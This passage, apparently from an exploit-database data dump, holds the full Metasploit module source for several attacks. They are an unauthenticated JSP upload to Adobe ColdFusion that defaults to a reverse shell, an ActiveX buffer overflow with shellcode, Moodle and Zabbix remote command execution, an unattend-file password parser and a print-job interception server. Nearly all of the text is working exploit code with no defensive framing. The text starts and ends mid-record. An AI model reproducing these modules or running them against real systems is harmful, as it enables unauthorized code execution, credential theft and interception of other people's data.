https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n include Msf::Exploit::Remote::HttpClient\n\n Rank = ExcellentRanking\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload',\n 'Description' => %q{\n A file upload vulnerability in the CKEditor of Adobe ColdFusion 11\n (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and\n ColdFusion 2018 (July 12 release) allows unauthenticated remote\n attackers to upload and execute JSP files through the filemanager\n plugin.\n Tested on Adobe ColdFusion 2018.0.0.310739.\n },\n 'Author' =>\n [\n 'Pete Freitag de Foundeo', # Vulnerability discovery\n 'Vahagn vah_13 Vardanian', # First public PoC\n 'Qazeer' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2018-15961' ],\n [ 'BID', '105314' ],\n [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]\n ],\n 'Privileged' => false,\n 'Platform' => %w{ linux win },\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w{ linux win },\n 'Payload' => { 'DisableNops' => true },\n 'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'RPORT' => 8500 },\n 'DisclosureDate' => 'Sep 11 2018'\n ))\n\n register_options [\n OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),\n ]\n end\n\n def exploit\n filename = rand_text_alpha_upper(1..10) + '.jsp'\n\n print_status(\"Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...\")\n\n mime = Rex::MIME::Message.new\n mime.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{filename}\\\"\")\n mime.add_part('path', 'text/plain', nil, 'form-data; name=\"path\"')\n\n post_str = mime.to_s\n post_str.strip!\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => 'multipart/form-data; boundary=' + mime.bound,\n 'data' => post_str,\n })\n\n unless res && res.code == 200\n fail_with Failure::Unknown, 'Upload Failed...'\n end\n\n print_good('Upload succeeded! Executing payload...')\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',\n 'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),\n 'method' => 'GET'\n }, 5)\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb"}, {"lastseen": "2019-12-07T15:12:35", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.\n", "modified": "2017-09-14T02:03:34", "published": "2015-02-06T17:05:29", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/X360_VIDEO_PLAYER_SET_TEXT_BOF", "href": "", "type": "metasploit", "title": "X360 VideoPlayer ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"X360 VideoPlayer ActiveX Control Buffer Overflow\",\n 'Description' => %q{\n This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Rh0', # vulnerability discovery and exploit, all the hard work\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['EDB', '35948'],\n ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/']\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'DisableNops' => true,\n 'PrependEncoder' => stack_adjust\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :activex => [\n {\n clsid: '{4B3476C6-185A-4D19-BB09-718B565FA67B}',\n method: 'SetText'\n }\n ],\n :os_name => OperatingSystems::Match::WINDOWS,\n :ua_name => Msf::HttpClients::IE,\n :ua_ver => '10.0'\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jan 30 2015\",\n 'DefaultTarget' => 0))\n end\n\n def stack_adjust\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n\n adjust\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n case request.uri\n when /exploit.js/\n print_status(\"Sending exploit.js...\")\n headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}\n send_exploit_html(cli, exploit_template(cli, target_info), headers)\n when /sprayer.js/\n print_status(\"Sending sprayer.js...\")\n headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}\n send_exploit_html(cli, sprayer_template(cli, target_info), headers)\n when /informer.js/\n print_status(\"Sending informer.js...\")\n headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}\n send_exploit_html(cli, informer_template(cli, target_info), headers)\n when /rop_builder.js/\n print_status(\"Sending rop_builder.js...\")\n headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}\n send_exploit_html(cli, rop_builder_template(cli, target_info), headers)\n else\n print_status(\"Sending main.html...\")\n headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}\n send_exploit_html(cli, main_template(cli, target_info), headers)\n end\n end\n\n def main_template(cli, target_info)\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')\n template = ''\n File.open(path, 'rb') { |f| template = strip_comments(f.read) }\n\n return template, binding()\n end\n\n def exploit_template(cli, target_info)\n shellcode = Rex::Text.to_hex(get_payload(cli, target_info))\n\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')\n template = ''\n File.open(path, 'rb') { |f| template = strip_comments(f.read) }\n\n return template, binding()\n end\n\n def sprayer_template(cli, target_info)\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')\n template = ''\n File.open(path, 'rb') { |f| template = strip_comments(f.read) }\n\n return template, binding()\n end\n\n def informer_template(cli, target_info)\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')\n template = ''\n File.open(path, 'rb') { |f| template = strip_comments(f.read) }\n\n return template, binding()\n end\n\n def rop_builder_template(cli, target_info)\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')\n template = ''\n File.open(path, 'rb') { |f| template = strip_comments(f.read) }\n\n return template, binding()\n end\n\n def strip_comments(input)\n input.gsub(/\\/\\/.*$/, '')\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/x360_video_player_set_text_bof.rb"}, {"lastseen": "2019-11-08T01:19:16", "bulletinFamily": "exploit", "description": "Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln. Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey and use this to escalate privileges to that of an admin, allowing the module to pop a shell as a previously unprivileged authenticated user. This module was tested against Moodle version 2.5.2 and 2.2.3.\n", "modified": "2019-05-10T18:02:01", "published": "2013-10-30T15:25:48", "id": "MSF:EXPLOIT/MULTI/HTTP/MOODLE_CMD_EXEC", "href": "", "type": "metasploit", "title": "Moodle Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Moodle Remote Command Execution',\n 'Description' => %q{\n Moodle allows an authenticated user to define spellcheck settings via the web interface.\n The user can update the spellcheck mechanism to point to a system-installed aspell binary.\n By updating the path for the spellchecker to an arbitrary command, an attacker can run\n arbitrary commands in the context of the web application upon spellchecking requests.\n\n This module also allows an attacker to leverage another privilege escalation vuln.\n Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey\n and use this to escalate privileges to that of an admin, allowing the module to pop a shell\n as a previously unprivileged authenticated user.\n\n This module was tested against Moodle version 2.5.2 and 2.2.3.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module\n ],\n 'References' =>\n [\n ['CVE', '2013-3630'],\n ['EDB', '28174'], #xss vuln allowing sesskey of admins to be stolen\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']\n ],\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl ruby telnet python',\n }\n },\n 'Platform' => ['unix', 'linux'],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Automatic',{}]],\n 'DisclosureDate' => 'Oct 30 2013',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'admin']),\n OptString.new('PASSWORD', [ true, \"Password to authenticate with\", '']),\n OptString.new('SESSKEY', [ false, \"The session key of the user to impersonate\", \"\"]),\n OptString.new('TARGETURI', [ true, \"The URI of the Moodle installation\", '/moodle/'])\n ])\n end\n\n def exploit\n init = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/index.php')\n })\n\n fail_with(Failure::Unreachable, 'No response received from the target.') unless init\n sess = init.get_cookies\n\n post = {\n 'username' => datastore[\"USERNAME\"],\n 'password' => datastore[\"PASSWORD\"]\n }\n\n print_status(\"Authenticating as user: \" << datastore[\"USERNAME\"])\n\n login = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/login/index.php'),\n 'vars_post' => post,\n 'cookie' => sess\n })\n\n if !login or login.code != 303\n fail_with(Failure::NoAccess, \"Login failed\")\n end\n\n sess = login.get_cookies\n\n print_status(\"Getting session key to update spellchecker if no session key was specified\")\n\n sesskey = ''\n if datastore['SESSKEY'] == ''\n tinymce = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/admin/settings.php') + '?section=editorsettingstinymce',\n 'cookie' => sess\n })\n\n sesskey = tinymce.get_hidden_inputs[1]['sesskey']\n unless sesskey\n fail_with(Failure::UnexpectedReply, \"Unable to get proper session key\")\n end\n else\n sesskey = datastore['SESSKEY']\n end\n\n post = {\n 'section' => 'editorsettingstinymce',\n 'sesskey' => sesskey,\n 'return' => '',\n 's_editor_tinymce_spellengine' => 'PSpellShell',\n 's_editor_tinymce_spelllanguagelist' => '%2BEnglish%3Den%2CDanish%3Dda%2CDutch%3Dnl%2CFinnish%3Dfi%2CFrench%3Dfr%2CGerman%3Dde%2CItalian%3Dit%2CPolish%3Dpl%2CPortuguese%3Dpt%2CSpanish%3Des%2CSwedish%3Dsv'\n }\n\n print_status(\"Updating spellchecker to use the system aspell\")\n\n post = {\n 'section' => 'systempaths',\n 'sesskey' => sesskey,\n 'return' => '',\n 's__gdversion' => '2',\n 's__pathtodu' => '/usr/bin/du',\n 's__aspellpath' => payload.encoded,\n 's__pathtodot' => ''\n }\n\n aspell = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/admin/settings.php'),\n 'vars_post' => post,\n 'cookie' => sess\n })\n\n spellcheck = '{\"id\":\"c0\",\"method\":\"checkWords\",\"params\":[\"en\",[\"\"]]}'\n\n print_status(\"Triggering payload\")\n\n resp = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php'),\n 'data' => spellcheck,\n 'ctype' => 'application/json',\n 'cookie' => sess\n })\n\n if !resp or resp.code != 200\n fail_with(Failure::PayloadFailed, \"Error triggering payload\")\n end\n\n end\nend\n", "cvss": {"score": 4.6, "vector": "AV:N/AC:H/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/moodle_cmd_exec.rb"}, {"lastseen": "2019-12-13T01:18:57", "bulletinFamily": "exploit", "description": "This module parses Unattend files in the target directory. See also: post/windows/gather/enum_unattend\n", "modified": "2019-09-01T18:51:13", "published": "2013-04-25T22:01:19", "id": "MSF:AUXILIARY/PARSER/UNATTEND", "href": "", "type": "metasploit", "title": "Auxilliary Parser Windows Unattend Passwords", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/parser/unattend'\n\nclass MetasploitModule < Msf::Auxiliary\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Auxilliary Parser Windows Unattend Passwords',\n 'Description' => %q{\n This module parses Unattend files in the target directory.\n\n See also: post/windows/gather/enum_unattend\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ben Campbell',\n ],\n 'References' =>\n [\n ['URL', 'http://technet.microsoft.com/en-us/library/ff715801'],\n ['URL', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'],\n ['URL', 'http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580']\n ],\n ))\n\n register_options([\n OptPath.new('PATH', [true, 'Directory or file to parse.']),\n OptBool.new('RECURSIVE', [true, 'Recursively check for files', false]),\n ])\n end\n\n def run\n if datastore['RECURSIVE']\n ext = \"**/*.xml\"\n else\n ext = \"/*.xml\"\n end\n\n if datastore['PATH'].ends_with?('.xml')\n filepath = datastore['PATH']\n else\n filepath = File.join(datastore['PATH'], ext)\n end\n\n Dir.glob(filepath) do |item|\n print_status \"Processing #{item}\"\n file = File.read(item)\n begin\n xml = REXML::Document.new(file)\n rescue REXML::ParseException => e\n print_error(\"#{item} invalid xml format.\")\n vprint_line(e.message)\n next\n end\n\n results = Rex::Parser::Unattend.parse(xml)\n table = Rex::Parser::Unattend.create_table(results)\n print_line table.to_s unless table.nil?\n print_line\n end\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/parser/unattend.rb"}, {"lastseen": "2019-11-27T19:17:56", "bulletinFamily": "exploit", "description": "This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The captured printjob can then be forwarded on to another printer (required for LPR printjobs). Resulting PCL/PS files can be read with GhostScript/GhostPCL. Note, this module does not yet support IPP connections.\n", "modified": "2019-03-05T09:38:51", "published": "2012-09-20T16:04:36", "id": "MSF:AUXILIARY/SERVER/CAPTURE/PRINTJOB_CAPTURE", "href": "", "type": "metasploit", "title": "Printjob Capture Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'Printjob Capture Service',\n 'Description' => %q{\n This module is designed to listen for PJL or PostScript print\n jobs. Once a print job is detected it is saved to loot. The\n captured printjob can then be forwarded on to another printer\n (required for LPR printjobs). Resulting PCL/PS files can be\n read with GhostScript/GhostPCL.\n\n Note, this module does not yet support IPP connections.\n },\n 'Author' => ['Chris John Riley', 'todb'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n # Based on previous prn-2-me tool (Python)\n ['URL', 'http://blog.c22.cc/toolsscripts/prn-2-me/'],\n # Readers for resulting PCL/PC\n ['URL', 'http://www.ghostscript.com']\n ],\n 'Actions' => [[ 'Capture' ]],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture'\n )\n\n register_options([\n OptPort.new('SRVPORT', [ true, 'The local port to listen on', 9100 ]),\n OptBool.new('FORWARD', [ true, 'Forward print jobs to another host', false ]),\n OptAddress.new('RHOST', [ false, 'Forward to remote host' ]),\n OptPort.new('RPORT', [ false, 'Forward to remote port', 9100 ]),\n OptBool.new('METADATA', [ true, 'Display Metadata from printjobs', true ]),\n OptEnum.new('MODE', [ true, 'Print mode', 'RAW', ['RAW', 'LPR']]) # TODO: Add IPP\n\n ])\n\n deregister_options('SSL', 'SSLVersion', 'SSLCert', 'RHOSTS')\n end\n\n def setup\n super\n @state = {}\n\n begin\n\n @srvhost = datastore['SRVHOST']\n @srvport = datastore['SRVPORT'] || 9100\n @mode = datastore['MODE'].upcase || 'RAW'\n if datastore['FORWARD']\n @forward = datastore['FORWARD']\n @rport = datastore['RPORT'] || 9100\n if datastore['RHOST'].nil?\n fail_with(Failure::BadConfig, \"Cannot forward without a valid RHOST\")\n end\n @rhost = datastore['RHOST']\n print_status(\"Forwarding all printjobs to #{@rhost}:#{@rport}\")\n end\n if not @mode == 'RAW' and not @forward\n fail_with(Failure::BadConfig, \"Cannot intercept LPR/IPP without a forwarding target\")\n end\n @metadata = datastore['METADATA']\n print_status(\"Starting Print Server on %s:%s - %s mode\" % [@srvhost, @srvport, @mode])\n\n exploit()\n\n rescue => ex\n print_error(ex.message)\n end\n end\n\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :user => nil,\n :pass => nil,\n :data => '',\n :raw_data => '',\n :prn_title => '',\n :prn_type => '',\n :prn_metadata => {},\n :meta_output => []\n }\n\n print_status(\"#{name}: Client connection from #{c.peerhost}:#{c.peerport}\")\n end\n\n def on_client_data(c)\n curr_data = c.get_once\n @state[c][:data] << curr_data\n if @mode == 'RAW'\n # RAW Mode - no further actions\n elsif @mode == 'LPR' or @mode == 'IPP'\n response = stream_data(curr_data)\n c.put(response)\n end\n\n if (Rex::Text.to_hex(curr_data.first)) == '\\x02' and (Rex::Text.to_hex(curr_data.last)) == '\\x0a'\n print_status(\"LPR Jobcmd \\\"%s\\\" received\" % curr_data[1..-2]) if not curr_data[1..-2].empty?\n end\n\n return if not @state[c][:data]\n end\n\n def on_client_close(c)\n print_status(\"#{name}: Client #{c.peerhost}:#{c.peerport} closed connection after %d bytes of data\" % @state[c][:data].length)\n sock.close if sock\n\n # forward RAW data as it's not streamed\n if @forward and @mode == 'RAW'\n forward_data(@state[c][:data])\n end\n\n #extract print data and Metadata from @state[c][:data]\n begin\n # postscript data\n if @state[c][:data] =~ /%!PS-Adobe/i\n @state[c][:prn_type] = \"PS\"\n print_good(\"Printjob intercepted - type PostScript\")\n # extract PostScript data including header and EOF marker\n @state[c][:raw_data] = @state[c][:data].match(/%!PS-Adobe.*%%EOF/im)[0]\n # pcl data (capture PCL or PJL start code)\n elsif @state[c][:data].unpack(\"H*\")[0] =~ /(1b45|1b25|1b26)/\n @state[c][:prn_type] = \"PCL\"\n print_good(\"Printjob intercepted - type PCL\")\n #extract everything between PCL start and end markers (various)\n @state[c][:raw_data] = Array(@state[c][:data].unpack(\"H*\")[0].match(/((1b45|1b25|1b26).*(1b45|1b252d313233343558))/i)[0]).pack(\"H*\")\n end\n # extract Postsript Metadata\n metadata_ps(c) if @state[c][:data] =~ /^%%/i\n\n # extract PJL Metadata\n metadata_pjl(c) if @state[c][:data] =~ /@PJL/i\n\n # extract IPP Metadata\n metadata_ipp(c) if @state[c][:data] =~ /POST \\/ipp/i or @state[c][:data] =~ /application\\/ipp/i\n\n if @state[c][:prn_type].empty?\n print_error(\"Unable to detect printjob type, dumping complete output\")\n @state[c][:prn_type] = \"Unknown Type\"\n @state[c][:raw_data] = @state[c][:data]\n end\n\n # output discovered Metadata if set\n if @state[c][:meta_output] and @metadata\n @state[c][:meta_output].sort.each do | out |\n # print metadata if not empty\n print_status(\"#{out}\") if not out.empty?\n end\n else\n print_status(\"No metadata gathered from printjob\")\n end\n\n # set name to unknown if not discovered via Metadata\n @state[c][:prn_title] = 'Unnamed' if @state[c][:prn_title].empty?\n\n #store loot\n storefile(c) if not @state[c][:raw_data].empty?\n\n # clear state\n @state.delete(c)\n\n rescue => ex\n print_error(ex.message)\n end\n end\n\n def metadata_pjl(c)\n # extract PJL Metadata\n\n @state[c][:prn_metadata] = @state[c][:data].scan(/^@PJL\\s(JOB=|SET\\s|COMMENT\\s)(.*)$/i)\n print_good(\"Extracting PJL Metadata\")\n @state[c][:prn_metadata].each do | meta |\n if meta[0] =~ /^COMMENT/i\n @state[c][:meta_output] << meta[0].to_s + meta[1].to_s\n end\n if meta[1] =~ /^NAME|^STRINGCODESET|^RESOLUTION|^USERNAME|^JOBNAME|^JOBATTR/i\n @state[c][:meta_output] << meta[1].to_s\n end\n if meta[1] =~ /^NAME/i\n @state[c][:prn_title] = meta[1].strip\n elsif meta[1] =~/^JOBNAME/i\n @state[c][:prn_title] = meta[1].strip\n end\n end\n end\n\n def metadata_ps(c)\n # extract Postsript Metadata\n\n @state[c][:prn_metadata] = @state[c][:data].scan(/^%%(.*)$/i)\n print_good(\"Extracting PostScript Metadata\")\n @state[c][:prn_metadata].each do | meta |\n if meta[0] =~ /^Title|^Creat(or|ionDate)|^For|^Target|^Language/i\n @state[c][:meta_output] << meta[0].to_s\n end\n if meta[0] =~ /^Title/i\n @state[c][:prn_title] = meta[0].strip\n end\n end\n end\n\n def metadata_ipp(c)\n # extract IPP Metadata\n\n @state[c][:prn_metadata] = @state[c][:data]\n print_good(\"Extracting IPP Metadata\")\n case @state[c][:prn_metadata]\n when /User-Agent:/i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/^User-Agent:.*/i)\n when /Server:/i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/^Server:.*/i)\n when /printer-uri..ipp:\\/\\/.*\\/ipp\\//i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/printer-uri..ipp:\\/\\/.*\\/ipp\\//i)\n when /requesting-user-name..\\w+/i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/requesting-user-name..\\w+/i)\n end\n end\n\n def forward_data(data_to_send)\n print_status(\"Forwarding PrintJob on to #{@rhost}:#{@rport}\")\n connect\n sock.put(data_to_send)\n sock.close\n end\n\n def stream_data(data_to_send)\n vprint_status(\"Streaming %d bytes of data to #{@rhost}:#{@rport}\" % data_to_send.length)\n connect if not sock\n sock.put(data_to_send)\n response = sock.get_once\n return response\n end\n\n def storefile(c)\n # store the file\n\n if @state[c][:raw_data]\n jobname = File.basename(@state[c][:prn_title].gsub(\"\\\\\",\"/\"), \".*\")\n filename = \"#{jobname}.#{@state[c][:prn_type]}\"\n loot = store_loot(\n \"prn_snarf.#{@state[c][:prn_type].downcase}\",\n \"#{@state[c][:prn_type]} printjob\",\n c.peerhost,\n @state[c][:raw_data],\n filename,\n \"PrintJob capture\"\n )\n print_good(\"Incoming printjob - %s saved to loot\" % @state[c][:prn_title])\n print_good(\"Loot filename: %s\" % loot)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/capture/printjob_capture.rb"}, {"lastseen": "2019-12-13T11:10:59", "bulletinFamily": "exploit", "description": "This module abuses the \"Command\" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID \"0\" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.\n", "modified": "2017-07-24T13:26:21", "published": "2012-08-23T16:29:39", "id": "MSF:EXPLOIT/LINUX/MISC/ZABBIX_SERVER_EXEC", "href": "", "type": "metasploit", "title": "Zabbix Server Arbitrary Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Zabbix Server Arbitrary Command Execution',\n 'Description' => %q{\n This module abuses the \"Command\" trap in Zabbix Server to execute arbitrary\n commands without authentication. By default the Node ID \"0\" is used, if it doesn't\n work, the Node ID is leaked from the error message and exploitation retried.\n\n According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability\n has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.\n },\n 'Author' =>\n [\n 'Nicob <nicob[at]nicob.net>', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-4498' ],\n [ 'OSVDB', '60965' ],\n [ 'BID', '37989' ],\n [ 'EDB', '10432' ],\n [ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ]\n ],\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Zabbix 1.6.7', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 10 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(10051),\n ])\n end\n\n def send_command(sock, node_id, cmd)\n host_id = Rex::Text.rand_text_numeric(3)\n msg = \"Command\\255\"\n msg << \"#{node_id}\\255\"\n msg << \"#{host_id}\\255\"\n msg << \"#{cmd}\\n\"\n sock.put(msg)\n res = sock.get_once\n return res\n end\n\n def check\n peer = \"#{rhost}:#{rport}\"\n node_id = 0\n clue = Rex::Text.rand_text_alpha(rand(5)+5)\n cmd = \"echo #{clue}\"\n\n connect\n vprint_status(\"Sending 'Command' request...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n\n if res\n vprint_status(res)\n if res =~ /#{clue}/\n return Exploit::CheckCode::Vulnerable\n elsif res =~ /-1/ and res=~ /NODE (\\d*)/\n node_id = $1\n vprint_good(\"Node ID #{node_id} discovered\")\n else\n return Exploit::CheckCode::Safe\n end\n else # No response\n return Exploit::CheckCode::Safe\n end\n\n # Retry with the good node_id\n connect\n vprint_status(\"Sending 'Command' request with discovered Node ID...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n if res and res =~ /#{clue}/\n return Exploit::CheckCode::Vulnerable\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n peer = \"#{rhost}:#{rport}\"\n node_id = 0\n cmd = payload.encoded\n\n connect\n print_status(\"Sending 'Command' request...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n\n if res and res =~ /-1/ and res=~ /NODE (\\d*)/\n # Retry with the good node_id\n node_id = $1\n print_good(\"Node ID #{node_id} discovered\")\n connect\n print_status(\"Sending 'Command' request with discovered Node ID...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n end\n\n # Read command output from socket if cmd/unix/generic payload was used\n if (datastore['CMD'])\n if res and res =~ /\\x30\\xad/\n print_good(\"Command executed successfully\")\n print_status(\"Output:\\n#{res.split(\"\\x30\\xad\").last}\")\n else\n print_error(\"Failed to execute the command\")\n end\n end\n\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/zabbix_server_exec.rb"}, {"lastseen": "2019-12-12T03:55:19", "bulletinFamily": "exploit", "description": "This module will check the file system and registry for particular artifacts. The list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. Any matches are written to the loot.\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-06T22:43:50", "id": "MSF:POST/WINDOWS/GATHER/ENUM_ARTIFACTS", "href": "", "type": "metasploit", "title": "Windows Gather File and Registry Artifacts Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'yaml'\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Auxiliary::Report\n include Msf::Post::File\n include Msf::Post::Windows::Registry\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Gather File and Registry Artifacts Enumeration',\n 'Description' => %q{\n This module will check the file system and 